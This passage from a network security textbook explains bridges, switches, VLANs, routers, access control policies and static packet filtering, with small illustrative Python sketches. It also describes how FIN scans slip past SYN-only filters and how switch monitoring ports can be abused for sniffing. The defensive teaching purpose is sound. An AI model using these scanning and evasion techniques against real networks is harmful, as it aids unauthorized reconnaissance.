When Thoth replies to Betty’s request, as shown in Figure 4.10, the bridge will look at the destination address in the frame of data again. This time, however, it finds a match in its table, noting that Betty is also attached to Port A. Because it knows Betty can receive this information directly, it drops the frame and blocks it from being transmitted from Port B. The bridge will also make a new table entry for Thoth, recording the MAC address as being off of Port A.

Figure 4.10: Thoth’s reply to Betty’s message

For as long as the bridge remembers each station’s MAC address, all communications between Betty and Thoth will be isolated from Sue and Babylnor. Traffic isolation is a powerful feature, because it means that systems on both sides of the bridge can be carrying on conversations at the same time, effectively doubling the available bandwidth. The bridge insures that communications on both sides stay isolated, as if they were not even connected together. Because stations cannot see transmissions on the other side of the bridge, they assume the network is free and send their data.
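The learn-flood-filter behavior just described fits in a short Python sketch. Thoth’s MAC address is the one used in the example; Betty’s is invented, since the text never gives it.

    BROADCAST = "FFFFFFFFFFFF"

    class Bridge:
        def __init__(self, ports):
            self.ports = ports          # e.g. ["A", "B"]
            self.table = {}             # MAC address -> port

        def receive(self, in_port, src, dst):
            self.table[src] = in_port   # learn where the sender lives
            if dst == BROADCAST or dst not in self.table:
                # Unknown or broadcast: flood out every other port.
                return [p for p in self.ports if p != in_port]
            out_port = self.table[dst]
            if out_port == in_port:
                return []               # local traffic: filter (drop) it
            return [out_port]           # known remote destination: forward

    bridge = Bridge(ports=["A", "B"])
    # Betty (invented MAC) sends to Thoth; Thoth is unknown, so flood to B:
    print(bridge.receive("A", src="00C08B0000AA", dst="00C08BBE0052"))  # ['B']
    # Thoth replies; Betty is known to be on Port A, so the frame is dropped:
    print(bridge.receive("A", src="00C08BBE0052", dst="00C08B0000AA"))  # []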
\nEach system only needs to contend for bandwidth with systems on its own segment. This means that there is no \nway for a station to have a collision outside of its segment. Thus these segments are referred to as collision \ndomains, as shown in Figure 4.11. Notice that one port on each side of the bridge is part of each collision domain. \nThis is because each of its ports will contend for bandwidth with the systems it is directly connected to. Because \nthe bridge isolates traffic within each collision domain, there is no way for separated systems to collide their \nsignals. The effect is a doubling of potential bandwidth. \n \nFigure 4.11: Two separate collision domains \nAlso notice that splitting the network into two collision domains has increased the security of the network. For \nexample, let’s say that the system named Babylnor becomes compromised. An attacker has gained high-level \naccess to this system and begins capturing network activity in order to look for sensitive information. \nGiven the above network design, Thoth and Betty would be able to carry on a conversation with relative security. \nThe only traffic that will find its way onto Babylnor’s collision domain is broadcast traffic. You may remember \nfrom Chapter 3 that a broadcast frame needs to be delivered to all local systems. For this reason, a bridge will also \nforward broadcast traffic. \nBy using a bridge in this situation, you get a double bonus light. You have not only increased performance, but \nsecurity as well. \nSo what happens when traffic needs to traverse the bridge? As mentioned, when a bridge is unsure of the location \nof a system it will always pass the packet along just in case. Once the bridge learns that the system is in fact \nlocated off of its other port, it will continue to pass the frame along as required. \nIf Betty begins communicating with Sue, for example, this data will cross the bridge and be transmitted onto the \nsame collision domain as Babylnor. This means that Babylnor is capable of capturing this data stream. While the \nbridge helped to secure Betty’s communications with Thoth, it provides no additional security when Betty begins \ncommunicating with Sue. \nIn order to secure both of these sessions, you would need a bridge capable of dedicating a single port to each \nsystem. This type of functionality is provided in a device referred to as a switch. \nSwitches \nSwitches are the marriage of hub and bridge technology. They resemble hubs in appearance, having multiple RJ45 \nconnectors for connecting network systems. Instead of being a dumb amplifier like a hub, however, a switch \nfunctions as though it has a little miniature bridge built into each port. A switch will keep track of the MAC \naddresses attached to each of its ports and route traffic destined for a certain address only to the port to which it is \nattached. \nFigure 4.12 shows a switched environment in which each device is connected to a dedicated port. The switch will \nlearn the MAC identification of each station once a single frame transmission occurs (identical to a bridge). \n" }, { "page_number": 76, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 76\nAssuming that this has already happened, you now find that at exactly the same instant Station 1 needs to send \ndata to Server 1, Station 2 needs to send data to Server 2, and Station 3 needs to send data to Server 3. 
\n \nFigure 4.12: A switch installation showing three workstations and three servers that need to communicate \nThere are some interesting things about this situation. The first is that each wire run involves only the switch and \nthe station attached to it. This means that each collision domain is limited to only these two devices, because each \nport of the switch is acting like a bridge. The only traffic seen by the workstations and servers is any frame \nspecifically sent to them or to the broadcast address. As a result, all three stations will see very little network \ntraffic and will be able to transmit immediately. This is a powerful feature that goes a long way toward increasing \npotential bandwidth. Given our example, if this is a 10Mbps topology, the effective throughput has just increased \nby a factor of 3. This is because all three sets of systems can carry on their conversations simultaneously, as the \nswitch isolates them from each other. While it is still technically 10Mbps Ethernet, potential throughput has \nincreased to 30Mbps. \nBesides increasing performance dramatically, you have also increased security. If any one of these systems \nbecomes compromised, the only sessions that can be monitored are sessions with the compromised system. For \nexample, if an attacker gains access to Server 2, she will not be able to monitor communication sessions with \nServers 1 or 3, only Server 2. \nThis is because monitoring devices can only collect traffic that is transmitting within their collision domain. Since \nServer 2’s collision domain consists of itself and the switch port it is connected to, the switch does an effective job \nof isolating System 2 from the communication sessions being held with the other servers. \nWhile this is a wonderful security feature, it does make legitimate monitoring of your network somewhat \ncumbersome. This is why many switches include a monitoring port. \nA monitoring port is simply a port on the switch that can be configured to receive a copy of all data transmitted to \none or more ports. For example, you could plug your analyzer into port 10 of the switch and configure the device \nto listen to all traffic on port 3. If port 3 is one of your servers, you can now analyze all traffic flowing to and from \nthis system. \nThis can also be a potential security hole. If an attacker is able to gain administrative access to the switch (through \ntelnet, HTTP, SNMP, or the console port), she would have free rein to monitor any system connected to, or \ncommunicating through, the switch. To return to our example, if the attacker could access Server 2 and the switch \nitself, she is now in a perfect position to monitor all network communications. \nNote \nKeep in mind that bridges, switches, and similar networking devices are designed \nprimarily to improve network performance, not to improve security. Increased security is \njust a secondary benefit. This means that they have not received the same type of abusive, \nreal-world testing as, say, a firewall or router product. A switch can augment your \nsecurity policy, but it should not be the core device to implement it. \nVLAN Technology \nSwitching introduces a new technology referred to as the virtual local area network (VLAN). Software running on \nthe switch allows you to set up connectivity parameters for connected systems by workgroup (referred to as \nVLAN groups) instead of by geographical location. 
The switch’s administrator is allowed to organize port transmissions logically so that connectivity is grouped according to each user’s requirements. The “virtual” part is that these VLAN groups can span multiple physical network segments, as well as multiple switches. By assigning all switch ports that connect to PCs used by accounting personnel to the same VLAN group, you can create a virtual accounting network.

Think of VLANs as being the virtual equivalent of taking an ax to a switch with many ports in order to create multiple switches. If you have a 24-port switch and you divide the ports equally into three separate VLANs, you essentially have three 8-port switches.

“Essentially” is the key word here, as you still have one physical device. While this makes for simpler administration, from a security perspective it is not nearly as good as having three physical switches. If an attacker is able to compromise a switch using VLANs, he might be able to configure his connection to monitor any of the other VLANs on the device.

This can be an extremely bad thing if you have one large switch providing connectivity on both sides of a traffic-control device such as a firewall. An attacker may not need to penetrate your firewall—he may find the switch to be a far easier target. At the very least, the attacker now has two potential ways into the network instead of just one.
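At its core, the “ax to a switch” idea is just a port-to-group mapping plus a forwarding check, as this Python sketch shows. The group names and port assignments are invented for the example.

    # VLAN membership: port number -> group. The switch only forwards
    # between ports that belong to the same group.
    VLANS = {
        "accounting":  {1, 2, 3, 4},
        "engineering": {5, 6, 7, 8},
        "dmz":         {9, 10},
    }

    def may_forward(port_a, port_b):
        """True if both ports sit in the same VLAN group."""
        return any(port_a in members and port_b in members
                   for members in VLANS.values())

    print(may_forward(1, 3))    # True:  both accounting; traffic flows
    print(may_forward(1, 9))    # False: separate "virtual switches"

The catch, as the text points out, is that this isolation is only configuration. Anyone who can rewrite the VLANS mapping, that is, anyone with administrative access to the one physical switch, can collapse it.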
Routers

A router is a multiport device that decides how to handle the contents of a frame, based on protocol and network information. To truly understand what this means, we must first look at what a protocol is and how it works.

Until now, we’ve been happily communicating using the Media Access Control address assigned to our networking devices. Our systems have used this number to contact other systems and transmit information as required.

The problem with this scheme is that it does not scale very well. For example, what if you have 2,000 systems that need to communicate with each other? You would now have 2,000 systems fighting each other for bandwidth on a single Ethernet network. Even if you employ switching, the number of broadcast frames will eventually reach a point where network performance will degrade and you cannot add any more systems. This is where protocols such as IP and IPX come in.

Network Protocols

At its lowest levels, a network protocol is a set of communication rules that provide the means for networking systems to be grouped by geographical area and common wiring. To indicate it is part of a specific group, each of these systems is assigned an identical protocol network address.

Network addresses are kind of like zip codes. Let’s assume someone mails a letter and the front of the envelope simply reads: Fritz & Wren, 7 Spring Road. If this happens in a very small town, the letter will probably get through (as if you’d used a MAC address on a LAN).

If the letter were mailed in a city like Boston or New York, however, the Post Office would have no clue where to send it (although postal workers would probably get a good laugh). Without a zip code, they may not even attempt delivery. The zip code provides a way to specify the general area where this letter needs to be delivered. The postal worker processing the letter is not required to know exactly where Spring Road is located. She simply looks at the zip code and forwards the letter to the Post Office responsible for this code. It is up to the local Post Office to know the location of Spring Road and to use this knowledge to deliver the letter.

Protocol network addresses operate in a similar fashion. A protocol-aware device will add the network address of the destination device to the data field of a frame. It will also record its own network address, in case the remote system needs to send a reply.

This is where a router comes in. A router is a protocol-aware device that maintains a table of all known networks. It uses this table to help forward information to its final destination. Let’s walk through an example to see how a routed network operates.

A Routed Network Example

Let’s assume you have a network similar to that shown in Figure 4.13 and that System B needs to transmit information to System F.

Figure 4.13: An example of a routed network

System B will begin by comparing its network address to that of System F. If there is a match, System B will assume the system is local and attempt to deliver the information directly. If the network addresses are different (as they are in our example), System B will refer to its routing table. If it does not have a specific entry for Network 3, it will fall back on its default router, which in this case is Tardis. In order to deliver the information to Tardis, System B would ARP for Tardis’s MAC address.

System B would then add the network protocol delivery information for System F (the source and destination network numbers) to the data and create a frame using Tardis’s MAC address as the destination. It does this because System B assumes that Tardis will take care of forwarding the information to the destination network.

Once Tardis receives the frame, it performs a CRC check to insure the integrity of the data. If the frame checks out, Tardis will then completely strip off the header and trailer. Tardis then analyzes the destination network address listed in the frame (in this case Network 3) to see if it is locally connected to this network. Since Tardis is not directly connected to Network 3, it consults its routing table in order to find the best route to get there. Tardis then discovers that Galifrey is capable of reaching Network 3.

Tardis now ARPs to discover the local MAC address being used by Galifrey. Tardis then creates a new frame around the data packet, placing its own MAC address in the source address field and Galifrey’s MAC address in the destination field. Finally, Tardis generates a new CRC value for the trailer.

While all this stripping and re-creating seems like a lot of work, it is a necessary part of this type of communication. Remember that routers are placed at the borders of a network segment. The CRC check is performed to insure that bad frames are not propagated throughout the network. The header information is stripped away because it is only applicable on Network 1. When Tardis goes to transmit the frame on Network 2, the original source and destination MAC addresses have no meaning. This is why Tardis must replace these values with ones that are valid for Network 2.

Because the majority of the header (12 of the 14 bytes) needs to be replaced anyway, it is easier to simply strip the header completely away and create it from scratch.
As for stripping off the trailer, once the source and destination MAC addresses change, the original CRC value is no longer valid. This is why the router must strip it off and create a new one.

Note A data field that contains protocol information is referred to as a packet. While this term is sometimes used interchangeably with the term frame, a packet in fact only describes a portion of a frame.

So Tardis has created a new frame around the packet and is ready to transmit it. Tardis will now transmit the frame out onto Network 2 so that the frame will be received by Galifrey. Galifrey receives the frame and processes it in a similar fashion to Tardis. It checks the CRC and strips off the header and trailer.

At this point, however, Galifrey realizes that it has a local connection to System F, because they are both connected to Network 3. Galifrey builds a new frame around the packet and, instead of needing to reference a table, it simply delivers the frame directly.
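To make the per-hop work concrete, here is a minimal sketch, in Python, of what a router such as Tardis does with each frame: verify the CRC, strip the old header and trailer, look up the next hop, and build a brand-new frame around the unchanged packet. The table contents, the frame layout, and the arp() helper are invented for illustration; no real router is implemented this way.

import zlib

ROUTING_TABLE = {"Network 3": "Galifrey"}      # destination network -> next hop
LOCAL_NETWORKS = {"Network 1", "Network 2"}    # networks this router connects to

def arp(node):
    # Stand-in for an ARP exchange: resolve a neighbor's name to its MAC.
    return {"Galifrey": "00:60:08:12:34:56"}[node]

def forward(frame, my_mac):
    # 1. CRC check, so corrupt frames are not propagated past the border.
    if zlib.crc32(frame["packet"]) != frame["crc"]:
        return None                            # bad frame: drop it
    # 2. Strip the topology header and trailer; only the packet survives.
    dest_network, dest_host, data = frame["packet"].decode().split("|")
    # 3. Deliver directly if the network is local; otherwise use the table.
    next_hop = dest_host if dest_network in LOCAL_NETWORKS else ROUTING_TABLE[dest_network]
    # 4. Build a brand-new frame: fresh MAC addresses, freshly computed CRC.
    return {"src_mac": my_mac, "dst_mac": arp(next_hop),
            "packet": frame["packet"], "crc": zlib.crc32(frame["packet"])}

packet = "Network 3|System F|data".encode()
frame = {"src_mac": "<System B's MAC>", "dst_mac": "<Tardis's MAC>",
         "packet": packet, "crc": zlib.crc32(packet)}
print(forward(frame, my_mac="<Tardis's MAC>")["dst_mac"])   # Galifrey's MAC

Note that only the frame is rebuilt at each hop; the packet inside rides through untouched.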
Protocol Specificity

In order for a router to provide this type of functionality, it needs to understand the rules for the protocol being used. This means that a router is protocol specific. Unlike a bridge, which will handle any valid topology traffic you throw at it, a router has to be specifically designed to support both the topology and the protocol being used. For example, if your network contains Banyan Vines systems, make sure that your router supports VinesIP.

Routers can be a powerful tool for controlling the flow of traffic on your network. If you have a network segment that is using IPX and IP but only IP is approved for use on the company backbone, simply enable IP support only on your router. The router will ignore any IPX traffic it receives.

A wonderful feature of routers is their ability to block broadcasts. (As I mentioned in Chapter 3, broadcasts are frames that contain all Fs for the destination MAC address.) Because any point on the other side of the router is a new network, these frames are blocked.

Note There is a counterpart to this called an all-networks broadcast that contains all Fs in both the network and MAC address fields. These frames are used to broadcast to local networks when the network address is not known. Most routers will still block these all-networks broadcasts by default.

Most routers also have the ability to filter out certain traffic. For example, let’s say your company enters a partnership with another organization. You need to access services on this new network but do not want to allow your partner to access your servers. To accomplish this, simply install a router between the two networks and configure it to filter out any communication sessions originating from the other organization’s network.

Most routers use static packet filtering to control traffic flow. The specifics of how this works will be covered in Chapter 6. For now, just keep in mind that routers cannot provide the same level of traffic control that may be found in the average firewall. Still, if your security requirements are minimal, packet filtering may be a good choice—chances are you will need a router to connect your networks, anyway.

A Comparison of Bridging/Switching and Routing

Table 4.1 summarizes the information discussed in the preceding sections. It provides a quick reference to the differences between controlling traffic at the datalink layer (bridges and switches) and controlling traffic at the network layer (routers).

Table 4.1: Bridging/Switching versus Routing

A Bridge (Switch):                                 A Router:
Uses the same network address off all ports        Uses different network addresses off all ports
Builds tables based on MAC address                 Builds tables based on network address
Filters traffic based on MAC information           Filters traffic based on network or host information
Forwards broadcast traffic                         Blocks broadcast traffic
Forwards traffic to unknown addresses              Blocks traffic to unknown addresses
Does not modify frame                              Creates a new header and trailer
Can forward traffic based on the frame header      Must always queue traffic before forwarding
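If it helps to see the first rows of Table 4.1 as data structures, the sketch below contrasts the two lookup styles. The table contents are invented, and real devices build and age these tables automatically.

MAC_TABLE   = {"00:60:08:aa:bb:cc": "port 2"}   # bridge/switch: MAC -> port
ROUTE_TABLE = {"Network 3": "Galifrey"}         # router: network -> next hop

def bridge_forward(dst_mac):
    # Broadcasts (all Fs) and unknown MACs are forwarded everywhere.
    if dst_mac == "ff:ff:ff:ff:ff:ff" or dst_mac not in MAC_TABLE:
        return "flood out all ports"
    return MAC_TABLE[dst_mac]

def route_forward(dst_network):
    # Broadcasts are not routed, and unknown networks are dropped.
    return ROUTE_TABLE.get(dst_network, "drop")

print(bridge_forward("ff:ff:ff:ff:ff:ff"))   # flood out all ports
print(route_forward("Network 9"))            # drop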
\nLayer-3 switching has some growing up to do before it can be considered a viable replacement for the time-tested \nrouter. Most modern routers have progressed to the point where they are capable of processing more than one \nmillion packets per second. Typically, higher traffic rates are required only on a network backbone. To date, this is \nwhy switches have dominated this area of the network. \nSwitch routing may make good security sense as a replacement for regular switches, however. The ability to \nsegregate traffic into true subnets instead of just collision domains brings a whole new level of control to this area \nof the network. \nLike their router counterparts, some switch routers support access control lists, which allow the network \nadministrator to manipulate which systems can communicate between each of the subnets and what services they \n" }, { "page_number": 81, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 81\ncan access. This is a much higher level of granular control than is provided with a regular switch. Switch routing \ncan help to fortify the security of your internal network without the typical degradation in performance. If your \nsecurity requirements are light, a switch router may be just the thing to augment your security policy. \nNote \nWe will look at some examples of implementing an access control list (ACL) on a Cisco \nrouter in Chapter 6. \n \nSummary \nWe’ve covered a lot of ground in this chapter. We discussed the basics of communication \nproperties and looked at transmission media and hardware from a security perspective. We \nalso discussed what traffic control options are available with typical network hardware. \nIn the next few chapters, we’ll look at systems that are specifically designed to implement \nsecurity policies. We will start by discussing firewalls and then work our way into intrusion-\ndetection systems. \nChapter 5: Firewalls \nIn this chapter, we will discuss firewalls and their implementation. Not all firewalls operate in the \nsame way, so you should select a firewall based upon the security it provides, while insuring that it \nis a proper fit for your business requirements. For example, if the firewall you chose will not support \nAOL’s Instant Messenger and IM is a critical business function, it may have been cheaper to simply \nbuy a pair of wire cutters. Before we discuss firewalls, we will review what information you need to \ncollect in order to make an informed purchase decision. \nDefining an Access Control Policy \nBefore you can choose the type or brand of firewall to purchase, you have to ask yourself a \nvery simple question (one that can be very time consuming to answer): What are (or should \nbe) the rules that deal with the flow of data traffic in and out of your network? The answers to \nthis question will form your access control policy. An access control policy is simply a \ncorporate policy that states which type of access is allowed across an organization’s network \nperimeters. For example, your organization may have a policy that states, “Our internal users \ncan access Internet Web sites and FTP sites or send SMTP mail, but we will only allow \ninbound SMTP mail from the Internet to our internal network.” \nAn access control policy may also apply to different areas within an internal network. For \nexample, your organization may have WAN links to supporting business partners. 
In this case, you might want to define a limited scope of access across this link to insure that it is only used for its intended purpose.

An access control policy simply defines the directions of data flow to and from different parts of the network. It will also specify what type of traffic is acceptable, assuming that all other data types will be blocked. When defining an access control policy, you can use a number of different parameters to describe traffic flow. Some common descriptors that can be implemented with a firewall are listed in Table 5.1.

Tip If you do not have an access control policy, you should create one. A clearly defined access control policy helps to insure that you select the correct firewall product or products. There is nothing worse than spending $10,000 on new firewall software, only to find it does not do everything you need it to.

Table 5.1: Access Control Descriptors

Direction: A description of acceptable traffic flow based on direction. For example, traffic from the Internet to the internal network (inbound) or traffic from the internal network heading towards the Internet (outbound).

Service: The type of server application that will be accessed. For example, Web access (HTTP), File Transfer Protocol (FTP), Simple Mail Transfer Protocol (SMTP).

Specific Host: Sometimes more granularity is required than simply specifying direction. For example, an organization may wish to allow inbound HTTP access, but to only a specific computer. Conversely, the organization may only have one business unit to which it wishes to grant Internet Web server access.

Individual Users: Many organizations have a business need to let certain individuals perform specific activities but do not want to open up this type of access to everyone. For example, the company CFO may need to be able to access internal resources from the Internet because she does a lot of traveling. In this case, the device enforcing the access control policy would attempt to authenticate anyone trying to gain access, to insure that only the CFO can get through.

Time of Day: Sometimes an organization may wish to restrict access during certain hours of the day. For example, an access control policy may state, “Internal users can access Web servers on the Internet only between the hours of 5:00 PM and 7:00 AM.”

Public or Private: At times it may be beneficial to use a public network (such as Frame Relay or the Internet) to transmit private data. An access control policy may define that one or more types of information should be encrypted as that information passes between two specific hosts or over entire network segments.

Quality of Service: An organization may wish to restrict access based on the amount of available bandwidth. For example, let’s assume that an organization has a Web server that is accessible from the Internet and wants to insure that access to this system is always responsive. The organization may have an access control policy that allows internal users to access the Internet at a restricted level of bandwidth when a potential client is currently accessing the Web server.
When the client is done accessing the server, the internal users would have 100 percent of the bandwidth available to access Internet resources.

Role: Similar to restricting access to individual users, administrators use roles to group individuals with similar access needs. This grouping simplifies the complexity of access control and eases administrative workloads.

Be creative and try to envision what type of access control your organization may require in the future. This will help to insure that you will not quickly outgrow your firewall solution. I have had quite a few organizations tell me that they had zero interest in accessing their local network from the Internet. Many of these same clients came back within six months, looking for an Internet-based remote access solution. Always try to think in scale—not just according to today’s requirements.
\nTable 5.1: Access Control Descriptors \nDescription \nDefinition \nDirection \nA description of acceptable traffic flow based on direction. For example, \ntraffic from the Internet to the internal network (inbound) or traffic from the \ninternal network heading towards the Internet (outbound). \nService \nThe type of server application that will be accessed. For example, Web \naccess (HTTP), File Transfer Protocol (FTP), Simple Mail Transfer Protocol \n(SMTP). \nSpecific \nHost \nSometimes more granularity is required than simply specifying direction. \nFor example, an organization may wish to allow inbound HTTP access, but \nto only a specific computer. Conversely, the organization may only have \none business unit to which it wishes to grant Internet Web server access. \nIndividual \nUsers \nMany organizations have a business need to let certain individuals perform \nspecific activities but do not want to open up this type of access to \neveryone. For example, the company CFO may need to be able to access \ninternal resources from the Internet because she does a lot of traveling. In \nthis case, the device enforcing the access control policy would attempt to \nauthenticate anyone trying to gain access, to insure that only the CFO can \nget through. \nTime of \nDay \nSometimes an organization may wish to restrict access during certain \nhours of the day. For example, an access control policy may state, “Internal \nusers can access Web servers on the Internet only between the hours of \n5:00 PM and 7:00 AM.” \nPublic or \nPrivate \nAt times it may be beneficial to use a public network (such as Frame Relay \nor the Internet) to transmit private data. An access control policy may \ndefine that one or more types of information should be encrypted as that \ninformation passes between two specific hosts or over entire network \nsegments. \nQuality of \nService \nAn organization may wish to restrict access based on the amount of \navailable bandwidth. For example, let’s assume that an organization has a \nWeb server that is accessible from the Internet and wants to insure that \naccess to this system is always responsive. The organization may have an \naccess control policy that allows internal users to access the Internet at a \nrestricted level of bandwidth when a potential client is currently accessing \n" }, { "page_number": 84, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 84\nTable 5.1: Access Control Descriptors \nDescription \nDefinition \nthe Web server. When the client is done accessing the server, the internal \nusers would have 100 percent of the bandwidth available to access \nInternet resources. \nRole \nSimilar to restricting access to individual users, administrators use roles to \ngroup individuals with similar access needs. This grouping simplifies the \ncomplexity of access control and eases administrative workloads. \nBe creative and try to envision what type of access control your organization may require in \nthe future. This will help to insure that you will not quickly outgrow your firewall solution. I have \nhad quite a few organizations tell me that they had zero interest in accessing their local \nnetwork from the Internet. Many of these same clients came back within six months, looking \nfor an Internet-based remote access solution. Always try to think in scale—not just according \nto today’s requirements. 
\n \nDefinition of a Firewall \nA firewall (unlike a simple router that merely directs network traffic) is a system or group of systems that enforces \nan access control policy on network traffic as it passes through access points. Once you have determined the levels \nof connectivity you wish to provide, it is the firewall’s job to insure that no additional access beyond this scope is \nallowed. It is up to your firewall to insure that your access control policy is followed by all users on the network. \nFirewalls are similar to other network devices in that their purpose is to control the flow of traffic. Unlike other \nnetwork devices, however, a firewall must control this traffic while taking into account that not all the packets of \ndata it sees may be what they appear to be. \nFor example, a bridge filters traffic based on the destination MAC address. If a host incorrectly labels the \ndestination MAC address and the bridge inadvertently passes the packet to the wrong destination, the bridge is not \nseen as being faulty or inadequate. It is expected that the host will follow certain network rules, and if it fails to \nfollow these rules, then the host is at fault, not the bridge. \nA firewall, however, must assume that hosts may try to fool it in order to sneak information past it. A firewall \ncannot use communication rules as a crutch; rather, it should expect that the rules will not be followed. This places \na lot of pressure on the firewall design, which must plan for every contingency. \nWhen Is a Firewall Required? \nTypically, access is controlled between the internal network and the Internet, but there are many other situations in \nwhich a firewall may be required. \nDial-In Modem Pool \nA firewall can be used to control access from a dial-in modem pool. For example, an organization may have an \naccess control policy that specifies that dial-in users may only access a single mail system. The organization does \nnot want to allow access to other internal servers or to the Internet. A firewall can be used to implement this \npolicy. \nExternal Connections to Business Partners \nMany organizations have permanent connections to remote business partners. This can create a difficult \nsituation—the connection is required for business, but now someone has access to the internal network from an \narea where security is not controlled by the organization. A firewall can be used to regulate and document access \nfrom these links. \n" }, { "page_number": 85, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 85\nBetween Departments \nSome organizations (such as trading companies) are required to maintain internal firewalls between different areas \nof the network. This is to ensure that internal users only have access to the information they require. A firewall at \nthe point of connection between these two networks enforces access control. \n \nFirewall Types \nNot all firewalls are built the same. A number of different technologies have been employed in order to control \naccess across a network perimeter. The most popular are \nƒ Static packet filtering \nƒ Dynamic packet filtering \nƒ Stateful filtering \nƒ Proxy \nStatic Packet Filtering \nStatic packet filtering controls traffic by using information stored within the packet headers. As packets are \nreceived by the filtering device, the attributes of the data stored within the packet headers are compared against the \naccess control policy (referred to as an access control list or ACL). 
Depending on how this header information compares to the ACL, the traffic is either allowed to pass or dropped.

A static packet filter can use the following information when regulating traffic flow:

• Destination IP address or subnet
• Source IP address or subnet
• Destination service port
• Source service port
• Flag (TCP only)

The TCP Flag Field

When the TCP transport is used, static packet filtering can use the flag field in the TCP header when making traffic control decisions. Figure 5.1 shows a packet decode of a TCP/IP packet. The Control Bits field identifies which flags have been set. Flags can be either turned on (binary value of 1) or turned off (binary value of 0).

Figure 5.1: A TCP/IP packet decode

So what does the flag field tell us? You may remember from our discussion of the TCP three-packet handshake in Chapter 3 that different flag values are used to identify different aspects of a communication session. The flag field gives the recipient hosts some additional information regarding the data the packet is carrying. Table 5.2 lists the valid flags and their uses.

Table 5.2: Valid TCP/IP Flags

ACK (Acknowledgment): Indicates that this data is a response to a data request and that there is useful information within the Acknowledgment Number field.

FIN (Final): Indicates that the transmitting system wishes to terminate the current session. Typically, each system in a communication session issues a FIN before the connection is actually closed.

PSH (Push): Prevents the transmitting system from queuing data prior to transmission. In many cases it is more efficient to let a transmitting system queue small chunks of data prior to transmission so that fewer packets are created. On the receiving side, Push tells the remote system not to queue the data, but to immediately push the information to the upper protocol levels.

RST (Reset): Resets the state of a current communication session. Reset is used when a non-recoverable transmission failure occurs. It is a transmitting system’s way of stating, “Were you listening to me? Do I have to say it again?” This is typically caused by a non-responsive host or by a spouse enthralled by an afternoon sporting event.

SYN (Synchronize): Used while initializing a communication session. This flag should not be set during any other portion of the communication process.

URG (Urgent): Indicates that the transmitting system has some high-priority information to pass along and that there is useful information within the Urgent Pointer field. When a system receives a packet with the Urgent flag set, it processes the information before any other data that may be waiting in queue. This is referred to as processing the data out-of-band.

The flag field plays an important part in helping a static packet filter regulate traffic. This is because a firewall is rarely told to block all traffic originating off of a specific port or going to a particular host.

For example, you may have an access control policy that states, “Our internal users can access any service out on the Internet, but all Internet traffic headed to the internal network should be blocked.” While this sounds like the ACL should be blocking all traffic coming from the Internet, this is in fact not the case.
\nRemember that all communications represent a two-step process. When you access a Web site, you make a data \nrequest (step 1) to which the Web site replies by returning the data you requested (step 2). This means that during \nstep 2 you are expecting data to be returned from the Internet-based host to the internal system. If the second half \nof our statement were taken verbatim (“…all Internet traffic headed to the internal network should be blocked.”), \nour replies would never make it back to the requesting host. We are back to the “wire cutters as an effective \nsecurity device” model: our firewall would not allow a complete communication session. \nThis is where our flag field comes into play. Remember that during the TCP three-packet handshake, the \noriginating system issues a packet with SYN=1 and all other flags equal to 0. The only time this sequence is true is \nwhen one system wishes to establish a connection to another. A packet filter will use this unique flag setting in \norder to control TCP sessions. By blocking the initial connection request, a data session between the two systems \ncannot be established. \nSo to make our access control policy more technically correct, we would state, “all Internet traffic headed to the \ninternal network with SYN=1 and all other flags equal to 0 should be blocked.” This means that any other flag \nsequence is assumed to be part of a previously established connection and would be allowed to pass through. \n" }, { "page_number": 87, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 87\nThis is clearly not the most secure method of locking down your network perimeter. By playing with the flag \nvalues, a would-be attacker can fool a static packet filter into allowing malicious traffic through. In this way, these \npredators stay one step ahead of these security devices. \nFIN Scanners \nBecause a simple packet filter is capable of blocking port scans, some people decided to become creative. The \nsimple port scanner eventually evolved into the FIN scanner. A FIN scanner operates under a similar principle to \nthe port scanner, except that the transmitted packets have FIN=1, ACK=1 and all other flags set to 0. \nNow, since our packet filter is only looking to block packets which have SYN=1 and all other flags set to 0, these \npackets are happily passed along. The result is that an attacker can analyze the returning data stream to determine \nwhich hosts are offering what services. If the destination host returns an ACK=1, RST=1 (a generic system \nresponse for nonexistent services), the software knows that this is an unused port. If, however, the destination host \nreturns an ACK=1, FIN=1 (the service’s agreeing to close the connect), the FIN scanner knows that there is a \nservice monitoring that port. This means that our packet filter is unable to deter these scanning probes. \n \nFor example, there are software programs called port scanners that can probe a destination host to see if any \nservice ports are open. The port scanner sends a connection request (SYN=1) to all the service ports within a \nspecified range. If any of these connection requests causes the destination host to return a connection request \nacknowledgment (SYN=1, ACK=1), the software knows that there is a service monitoring that port. \nPacket Filtering UDP Traffic \nAs if TCP traffic were not hard enough to control, UDP traffic is actually worse. 
Packet Filtering UDP Traffic

As if TCP traffic were not hard enough to control, UDP traffic is actually worse. This is because UDP provides even less information regarding a connection’s state than TCP does. Figure 5.2 shows a packet decode of a UDP header.

Figure 5.2: A UDP header decode

Notice that our UDP header does not use flags for indicating a session’s state. This means that there is no way to determine if a packet is a data request or a reply to a previous request. The only information that can be used to regulate traffic is the source and destination port number. Even this information is of little use in many situations, because some services use the same source and destination port number.

For example, when two Domain Name Servers (DNS) are exchanging information, they use a source and destination port number of 53. Unlike many other services, they do not use a reply port of greater than 1023. This means that a static packet filter has no effective means of limiting DNS traffic to only a single direction. You cannot block inbound traffic to port 53, because that would block data replies as well as data requests.

This is why, in many cases, the only effective means of controlling UDP traffic with a static packet filter is either to block the port or to let it through and hope for the best. Most people tend to stick with the former solution, unless they have an extremely pressing need to allow through UDP traffic (such as running networked Quake games, which use UDP port 26000).

Packet Filtering ICMP

The Internet Control Message Protocol (ICMP) provides background support for the IP protocol. It is not used to transmit user data, but is used for maintenance duty to insure that all is running smoothly. For example, Ping uses ICMP to insure that there is connectivity between two hosts. Figure 5.3 shows a packet decode of an ICMP header.

Figure 5.3: An ICMP header

Note ICMP does not use service ports. There is a Type field to identify the ICMP packet type as well as a Code field to provide even more granular information about the current session.

The Code field can be a bit confusing. For example, in Figure 5.3 the code states Protocol Unreachable; Host Unreachable. This could lead you to think that the destination system is not responding. If you compare the source IP address for this ICMP packet to the destination IP address in the section after Original IP Packet Header, you will notice that they are the same (10.1.1.100). So if the destination was in fact "unreachable," how could it have possibly sent this reply?

The combination of these two codes actually means that the requested service was not available. If you look at the top of Figure 5.3, you will see that the transmission that prompted this reply was a Trivial File Transfer Protocol (TFTP) request for resume.txt. Only a destination host will generate a protocol unreachable error. Table 5.3 identifies the different type field values for ICMP packets.

